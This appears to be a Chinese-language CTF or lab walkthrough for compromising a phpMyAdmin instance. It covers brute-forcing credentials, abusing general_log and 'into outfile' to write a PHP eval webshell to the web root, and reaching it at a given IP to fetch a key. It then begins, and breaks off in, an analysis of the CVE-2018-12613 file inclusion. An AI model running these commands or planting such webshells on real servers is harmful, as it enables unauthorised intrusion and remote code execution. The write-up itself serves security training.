phpMyAdmin
第一种:
一、利用burp爆破出账号密码
二、尝试写马连入蚁剑
1.发现MySQL对导入导出没做任何限制
secure_file_priv为null 表示不允许导入导出
secure_file_priv 指定文件夹时,表示mysql的导入导出只能发生在指定的文件夹
secure_file_priv 没有设置时,则表示没有任何限制
2.查询日志
show variables like 'general_log%'
3.利用日志写文件
开启general_log: set global general_log=ON
设置日志写入文件
SET global general_log_file='/var/www/html/cao.php'
4.访问写入的日志文件
6.尝试直接通过into outfile写入一句话木马
select '<?php eval($_REQUEST[cao]); ?>' into outfile '/var/www/html/cao2.php'
7.访问phpinfo文件,并连接蚁剑得到key值
http://219.153.49.228:42067/cao2.php?cao=phpinfo();
在根目录发现key值
第二种:
漏洞详情:
关于漏洞分析可以查看这篇文章CVE-2018-12613phpMyAdmin 后台文件包含漏洞分析
一、下载index.php文件进行分析
1.发现55到63行存在问题
$target_blacklist